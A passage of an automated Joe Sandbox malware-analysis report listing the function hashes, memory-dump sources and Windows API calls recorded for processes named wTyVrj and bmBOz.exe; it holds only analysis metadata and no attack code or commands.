Instruction Fuzzy Hash: 17115B75904284DFDB15CF14D9C4B15BFA2FB84328F28C6AAD8494B796C33AD84ACB52

Function 071CA250 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3bfe7ed35c634e18b0b4b7f08e9cc69a224d4e17a0437ab793c1c7f46c5890
Instruction ID: 905d5954c5518e8886a24d71df6ead6af8567efd64692caaecac5e7826b3b54d
Opcode Fuzzy Hash: 9b3bfe7ed35c634e18b0b4b7f08e9cc69a224d4e17a0437ab793c1c7f46c5890
Instruction Fuzzy Hash: FD01AD757001250BEB26D6AD9450B6AB2DAEFD8320F10C83EF50AD73C4EA66DC024391

Function 00F02668 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b6b6edee4e0a2de632ef142b82c0921358cb745688daa3e773fb1061252c830
Instruction ID: c9abde9b7b619cb1b0679bdc2227a83a2046f04b50939eddc2cdcd958c655653
Opcode Fuzzy Hash: 3b6b6edee4e0a2de632ef142b82c0921358cb745688daa3e773fb1061252c830
Instruction Fuzzy Hash: 6501F4B2F012542BDB55E76E9C106DFBBEE8FC1760B14806AE408D7691DE648C02A7B0

Function 00F035FC Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766e35dcaf9a9445dd73d6e9485748888bcab49c2123021d756a6959ccd482fb
Instruction ID: 89df29b56ac9bd4c1f53f223ee330cfe4e3d1790cbad75eb19ad294de8f6ed75
Opcode Fuzzy Hash: 766e35dcaf9a9445dd73d6e9485748888bcab49c2123021d756a6959ccd482fb
Instruction Fuzzy Hash: EE019EF1604710DFD3249B69D844627BBE5BBC4310B148919E707A7A90C771F805FB64

Function 00F052CF Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070195e39e0c58c2051ae73f69be1e8ab0449cd9d66da9000e4e7b05a11562c7
Instruction ID: 7c15242737604de30a19d13d4814354382acb06b2b1cf04af5e89eac50982bce
Opcode Fuzzy Hash: 070195e39e0c58c2051ae73f69be1e8ab0449cd9d66da9000e4e7b05a11562c7
Instruction Fuzzy Hash: 79F024357141105FD714A279A859AAF33CBEFC97B4B40007AE10ECB391CA50DC028BE2

Function 00F04F14 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ee5be139eeb11499aecedb71c82e35531bce9599f21cc4987aa0541781833d
Instruction ID: b6fd585e235faf8836977dd8d2d72e51a2f464a7ba4f838ffa8613f8f04b378b
Opcode Fuzzy Hash: f1ee5be139eeb11499aecedb71c82e35531bce9599f21cc4987aa0541781833d
Instruction Fuzzy Hash: BA112EB1800209DFDB11CF59C4847DEBFF1BB48321F24C169E928AB294C3745941DF94

Function 00FCD819 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3909511102.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_fcd000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae20d1b20fd327bb4180addc8bb17c4182a69ef9e6862e575c9e8c4b71aa4753
Instruction ID: 95f00da27d8c1ff2990965bf2ae313ea8754bc52afda6d667529a1e9c4af836b
Opcode Fuzzy Hash: ae20d1b20fd327bb4180addc8bb17c4182a69ef9e6862e575c9e8c4b71aa4753
Instruction Fuzzy Hash: 3901F771804301AAE7205A25CE85F6AFF98EF41730F18846EED080E2C2C339D844DAB2

Function 00F01FC1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd519794989700192b13f7e95eeed8286880e6f4193622e9348f92ee17802e6b
Instruction ID: a82ab581384b25d65173c818ad2966a16b15443de13200e6e35b63a2eb5c0a01
Opcode Fuzzy Hash: cd519794989700192b13f7e95eeed8286880e6f4193622e9348f92ee17802e6b
Instruction Fuzzy Hash: ED012C3691021A9BCF44DF90C995BEEB7B9BF48310F204025D911B7291DB39AD46EBA1

Function 00F01E90 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171f5b6dd1afb1df629cd7053e0f20667cd0cd1f9c44023d429cb0fd789812bc
Instruction ID: 591c3b6893f137daec595e14300c2bfd380279f4898c2fc0c4a248cc8950ad9c
Opcode Fuzzy Hash: 171f5b6dd1afb1df629cd7053e0f20667cd0cd1f9c44023d429cb0fd789812bc
Instruction Fuzzy Hash: 3901C832D061559FCB21CFA8D8C599DFF71FB06320B15446AE945C7152D330A944DB51

Function 00F04F20 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d32692ee5bdfc1288d8c4ff6cdef94222f8071b3deb077bade723f78556f985
Instruction ID: e8d26406f662677e19b0f17b1162490504dcad1e64fa90b81797e124eaad60a7
Opcode Fuzzy Hash: 8d32692ee5bdfc1288d8c4ff6cdef94222f8071b3deb077bade723f78556f985
Instruction Fuzzy Hash: 03012DB0900209DFDB14CF5AC48879EBEF1BB48321F24C169E928AB2D4C7749980EB94

Function 00F028E9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b3394eed4494030401ebb7b3dcf0caf387297a1c3d80b3dd1a6e72b3022e9bf
Instruction ID: 26ae593bf897d9de6d14b3ded9971141a0d466c4284c4bbc21f41be70c18b570
Opcode Fuzzy Hash: 5b3394eed4494030401ebb7b3dcf0caf387297a1c3d80b3dd1a6e72b3022e9bf
Instruction Fuzzy Hash: E6F05E3B00520AAFCB01CF44EC42ED73F29AF853607248046F95447562C732D9A5EBF1

Function 00F052E0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf988a8addfec7c2ba23951874ee9ebf460a41155aba675efa8540938f06f7b
Instruction ID: ca2a583b16200c59c39f2be0144be4baa078c6e15d165dc60a5eacf520d82987
Opcode Fuzzy Hash: 0bf988a8addfec7c2ba23951874ee9ebf460a41155aba675efa8540938f06f7b
Instruction Fuzzy Hash: 50F0A0357201101FCB18A1AD9458A6F63CFFBC97B4B904438E10ED7390DA90DC019A91

Function 00FCD818 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3909511102.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_fcd000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f473bd00e7bebb5b813575ce2cf16680ddef0457a2a97530d9366f35d77ce4e
Instruction ID: ea1298c60885fa76683840f442e39071851f7267b720add2eb5e4c4b3e9117ab
Opcode Fuzzy Hash: 4f473bd00e7bebb5b813575ce2cf16680ddef0457a2a97530d9366f35d77ce4e
Instruction Fuzzy Hash: 7AF06271844344AEEB248A16DD84B66FFA8EB51734F18C55EFD084F2D6C3799844CAB1

Function 00F04279 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a80dc4098ab7aab2b2e4ab0b42458a9274731db95b87f2278dd16343866c32b
Instruction ID: 917967432fc4a75b9340c5d4000ed8d65aef60d1eecc1a4a571b65b3406273ff
Opcode Fuzzy Hash: 4a80dc4098ab7aab2b2e4ab0b42458a9274731db95b87f2278dd16343866c32b
Instruction Fuzzy Hash: 46F09075E05740AFCB21CF68D8004AABFF4AF4A31070486AFE585D7A52C331A918DB91

Function 071CC510 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dace111e3d65ea0233e767d09fc276f06ea50dac9dbadcc7b8173d0597f2080
Instruction ID: e39f1c7d2ed8428dd55d79523e6e97bd02b5c4cf8f0391e68e26b349ae9e6b2d
Opcode Fuzzy Hash: 2dace111e3d65ea0233e767d09fc276f06ea50dac9dbadcc7b8173d0597f2080
Instruction Fuzzy Hash: 7FF0E5B1B093866FCB12CFB49805299BFB89B13214F2444DED448CB183D376CD4583A1

Function 00F04288 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ffb969da09b3cda0a5c11f37808b9ab1e951fba4b9bda4ef69273564c568091
Instruction ID: aec6742ff546f3dd6f3ffc4b73cf462772fe062b67a2b47644b9c91ea866f3bb
Opcode Fuzzy Hash: 9ffb969da09b3cda0a5c11f37808b9ab1e951fba4b9bda4ef69273564c568091
Instruction Fuzzy Hash: 57F03075E00714AFCB34CFA9D8044AABBF9FF49710B408A6AE555A3640D731E918DF90

Function 00F015C8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 981503c23f6a0f4d36f539863284b286a81fee1ed0b3ade77477576ffb2e203a
Instruction ID: 83aec6ad061d006db06d77c85ea5624bdafd87cacd5173b6949bdbbc22b7b0f8
Opcode Fuzzy Hash: 981503c23f6a0f4d36f539863284b286a81fee1ed0b3ade77477576ffb2e203a
Instruction Fuzzy Hash: EBF0A071901249DFD704EF60D94395D7B75FB063487104099D840D7262D7396E15CBA6

Function 071CC520 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55bce41801d03ee905a3c3b38f510be7035cbf56250fd0af159dc8253996f9a
Instruction ID: a07bc214d845c2a9fb844f026e1d333264b42ff861d642fe492c41313786bc92
Opcode Fuzzy Hash: c55bce41801d03ee905a3c3b38f510be7035cbf56250fd0af159dc8253996f9a
Instruction Fuzzy Hash: FAE08CB1B0020AABDB10DEE4994576AB2ADE712204F2088A8D509C7280E232DE0247A0

Function 00F015D8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117fa336c69f1b4ccb3662c51b024a3eefbae23504aa961f0beefd90809b6481
Instruction ID: 7919a240efc7b043c32a5484aac5cc92b3948fc8f9aeec0bd76f5d9310c91f42
Opcode Fuzzy Hash: 117fa336c69f1b4ccb3662c51b024a3eefbae23504aa961f0beefd90809b6481
Instruction Fuzzy Hash: 43E08674A0020DEFCB00FFB5EA4195D77B5FB48308B108159E804A3354DB716E05DB55

Function 00F02C5E Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c737d3eeb9e8d46791744543bf1fca020ff8956604a8047ac704fb3f1f71fa1
Instruction ID: 3871e8dee7cfd580132b61f9fac2b546e471fcc83b1769810f10d8b9cb8f9cca
Opcode Fuzzy Hash: 6c737d3eeb9e8d46791744543bf1fca020ff8956604a8047ac704fb3f1f71fa1
Instruction Fuzzy Hash: 9EC08C27710021034255625C38886AF00CB96CA7A1355007AB202F3385CC444C0233E0

Function 00F04010 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 630fdedf0c471046434ef20950e580d7c234d433b93f2de29c66c7160ee4852e
Instruction ID: 49c8ede30a9b03b89937b881e799e68a0eaa66aa9c550a355ff4ce17d7fdcc06
Opcode Fuzzy Hash: 630fdedf0c471046434ef20950e580d7c234d433b93f2de29c66c7160ee4852e
Instruction Fuzzy Hash: 95B0922231823917DA08319D6822AAE768E8B89B60F04007BA60D877968CDADD4116EE

Function 00F0400F Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138fcf03dfc47d3de9223ea4d968940fa11116382a2d8d10c617b3f177110f8a
Instruction ID: 6ea3c90748cf764f45f117d1be7008fe29efb77147139721dc4a613bc733b159
Opcode Fuzzy Hash: 138fcf03dfc47d3de9223ea4d968940fa11116382a2d8d10c617b3f177110f8a
Instruction Fuzzy Hash: 21C08C213081640ACB0421AC2821AFD2B890B84310B04016FE00A837928CC58C010AC9

Function 00F02B93 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 609a84dd839ac6e238f8ee77d7b1ea5884d98203e0e1eaa0f1e8fd71ed9b388d
Instruction ID: 380fdd0cda7c9b65cab4d52c1ddcbb3557e616289e0849d1017818a92bee8017
Opcode Fuzzy Hash: 609a84dd839ac6e238f8ee77d7b1ea5884d98203e0e1eaa0f1e8fd71ed9b388d
Instruction Fuzzy Hash: CCD092B1C4021ACBEB608F80C89D7EEBB70BB44319F100419D011A61D0CBB94945EFA1

Non-executed Functions

Function 071CD178 Relevance: 7.9, Strings: 6, Instructions: 435COMMON

Download Yara Rule

Strings

$q, xrefs: 071CD6B3
$q, xrefs: 071CD486
$q, xrefs: 071CD6A7
$q, xrefs: 071CD47A
$q, xrefs: 071CD3F6
$q, xrefs: 071CD637

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: 9ece5c2a1c8fdfba7135956b65cc91964a208146c845279423552277350cbb96
Instruction ID: 215f45ba8657ba39646699bd963a185c3936746eda2fcbd63259e3c4fc025bc2
Opcode Fuzzy Hash: 9ece5c2a1c8fdfba7135956b65cc91964a208146c845279423552277350cbb96
Instruction Fuzzy Hash: 9DF14B78B003098FDB25EBB9D555B6EB7A3AF84304F24852DD40ADB394DB34AC46CB81

Function 071CEA40 Relevance: 5.3, Strings: 4, Instructions: 298COMMON

Download Yara Rule

Strings

$q, xrefs: 071CED36
$q, xrefs: 071CECCB
$q, xrefs: 071CED2A
$q, xrefs: 071CECBF

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 6824becb2098bb46e8d0d6ae96649e6d29fcdacf2e8ab0b417b4e7e7e55422fc
Instruction ID: 619f65f20629d35e3bc4aa36a6e847caa459ca65a9469004d4ac56620f0b93c2
Opcode Fuzzy Hash: 6824becb2098bb46e8d0d6ae96649e6d29fcdacf2e8ab0b417b4e7e7e55422fc
Instruction Fuzzy Hash: 21B14B74A002098FDB29EBA9D5547AEB7A3FF84310F28852DD006DB395DB35DC46CB91

Function 071CEE88 Relevance: 5.2, Strings: 4, Instructions: 190COMMON

Download Yara Rule

Strings

LRq, xrefs: 071CEF8E
$q, xrefs: 071CEF17
$q, xrefs: 071CEF23
LRq, xrefs: 071CEFF4

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID: LRq$LRq$$q$$q
API String ID: 0-2204215535
Opcode ID: 7e4cbb092243021501b1fce22febcbbb889072e7d2cf8a1bc560f42e28182803
Instruction ID: 286b7e6c1899fe326061712a074f1216457e561d542a98e9b7846cbc221deaab
Opcode Fuzzy Hash: 7e4cbb092243021501b1fce22febcbbb889072e7d2cf8a1bc560f42e28182803
Instruction Fuzzy Hash: C961A175B002069FDB18EBA8C951B6EB3E7EF88704F14856CE406DB395DB31EC058B52

Analysis Process: bmBOz.exePID: 5528, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	73
Total number of Limit Nodes:	7

Executed Functions

Function 0555268A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1636319917.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5550000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f856078cb6ef196c6e9e3938ef9a8019fc75ef9e9e3aaff55102532b0daca173
Instruction ID: 5b800fad23cfd876f84047f668bc355902ad926e8940e0e927a670aa99e332ac
Opcode Fuzzy Hash: f856078cb6ef196c6e9e3938ef9a8019fc75ef9e9e3aaff55102532b0daca173
Instruction Fuzzy Hash: DED0177890C108CACB80CF50C5A84F8BBBEFB0A330F403566980AA3212DE309A84CF84

Function 0106DDC8 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0106DE56
GetCurrentThread.KERNEL32 ref: 0106DE93
GetCurrentProcess.KERNEL32 ref: 0106DED0
GetCurrentThreadId.KERNEL32 ref: 0106DF29

Memory Dump Source

Source File: 00000011.00000002.1629394915.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1060000_bmBOz.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0ce7e56623ec2866b088dc11780ac6ca96194a97096d92f5dde0286a03b3135e
Instruction ID: ccd40f3c537e3d9c646c8cc18a9dc3bc52059854cf10f00602faefcad53c07f3
Opcode Fuzzy Hash: 0ce7e56623ec2866b088dc11780ac6ca96194a97096d92f5dde0286a03b3135e
Instruction Fuzzy Hash: BB5184B0900309CFEB58CFA9D948BEEBBF1FF88304F208459E049AB2A1D7355944CB25

Function 0106DDD8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0106DE56
GetCurrentThread.KERNEL32 ref: 0106DE93
GetCurrentProcess.KERNEL32 ref: 0106DED0
GetCurrentThreadId.KERNEL32 ref: 0106DF29

Memory Dump Source

Source File: 00000011.00000002.1629394915.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1060000_bmBOz.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7946e51631951ebdf35eeeba2f8aae628a38700b07232b100772300dd77add2f
Instruction ID: a3253bf114effc85d01d6d13e2e61f88de756d218c43dcf84dc01f4440c04e5b
Opcode Fuzzy Hash: 7946e51631951ebdf35eeeba2f8aae628a38700b07232b100772300dd77add2f
Instruction Fuzzy Hash: EE5145B0900209CFEB58DFAAD988BDEBBF5FF88304F208459E159AB390D7355944CB65

Function 0106BB40 Relevance: 1.7, APIs: 1, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0106BDA6

Memory Dump Source

Source File: 00000011.00000002.1629394915.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1060000_bmBOz.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b983894e980835d9863c038cdb51d43c01dddea65b742a12a752bbecf07b403f
Instruction ID: e0ffef4d6f68311bb28ca28f0c5791488834df575967311e7ee856151408b128
Opcode Fuzzy Hash: b983894e980835d9863c038cdb51d43c01dddea65b742a12a752bbecf07b403f
Instruction Fuzzy Hash: E18158B0A00B058FD764DF29D44079ABBF5FF88314F00892ED486CBA51DB75E945CB91

Function 02F0261D Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02F027C2

Memory Dump Source

Source File: 00000011.00000002.1631745935.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2f00000_bmBOz.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ff971dc252d98ccd409681066d657494fbbedc96e8af76ad75b70455b9281035
Instruction ID: ed6662bc261c3f16186068ec3ab11ebf8b5b09ea718502e8ffc44c375b60001e
Opcode Fuzzy Hash: ff971dc252d98ccd409681066d657494fbbedc96e8af76ad75b70455b9281035
Instruction Fuzzy Hash: D05101B1C103489FDB15CFA9C884ADEBFB1FF48310F24816AE909AB651D7759845CFA0

Function 02F026A4 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02F027C2

Memory Dump Source

Source File: 00000011.00000002.1631745935.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2f00000_bmBOz.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 054d85eb7bf768a651be111a9baae4c90929099147a9de9e66a78befd2729470
Instruction ID: b47ddf50cefbcff7ada3d55d7661ee9605d5dd4f5c48ff71647d769ee77f2335
Opcode Fuzzy Hash: 054d85eb7bf768a651be111a9baae4c90929099147a9de9e66a78befd2729470
Instruction Fuzzy Hash: 3C51DFB1D003489FDB14CF99C984ADEBBB1BF48314F24822AE919AB250D7759885CF90

Function 02F026B0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02F027C2

Memory Dump Source

Source File: 00000011.00000002.1631745935.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2f00000_bmBOz.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 73dfd8b36d8ee7fb63a473027a6541dbec15086fb2ab184dde2de9dd23daf1b9
Instruction ID: 8022107dc697f1ca664c85fc8dd48184578b10b3773f523716fe237ff84b303e
Opcode Fuzzy Hash: 73dfd8b36d8ee7fb63a473027a6541dbec15086fb2ab184dde2de9dd23daf1b9
Instruction Fuzzy Hash: 0541DEB5D003489FDB14CF9AC884ADEBBB5BF48340F24812AE919AB250D774A845CF90

Function 0106590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010659C9

Memory Dump Source

Source File: 00000011.00000002.1629394915.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1060000_bmBOz.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c3efc4052874d19ab0abfb49a6f6c5b70836cb42ffcffaf9a750c045ad816304
Instruction ID: 8dca790979f452c9bee5be863ad1124d003b2eddc119cda7635111b43084ab28
Opcode Fuzzy Hash: c3efc4052874d19ab0abfb49a6f6c5b70836cb42ffcffaf9a750c045ad816304
Instruction Fuzzy Hash: CA41BCB1C00719CFEB24CFA9C884BDDBBB5BF49314F20816AD448AB254DB766946CF90

Function 02F00B6C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02F04D41

Memory Dump Source

Source File: 00000011.00000002.1631745935.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2f00000_bmBOz.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 66871bd13e13a28528562104dbe134add9f56f737f532a68c431df2f0eca4a02
Instruction ID: bc248fd15ff60cbc03f51d3b6d47a03c5114b00ef5ef46173c69979f7b89a14b
Opcode Fuzzy Hash: 66871bd13e13a28528562104dbe134add9f56f737f532a68c431df2f0eca4a02
Instruction Fuzzy Hash: 144127B5A00309DFDB14CF99C488BAABBF5FB88314F25C459D619AB361D774A841CFA0

Function 01064514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010659C9

Memory Dump Source

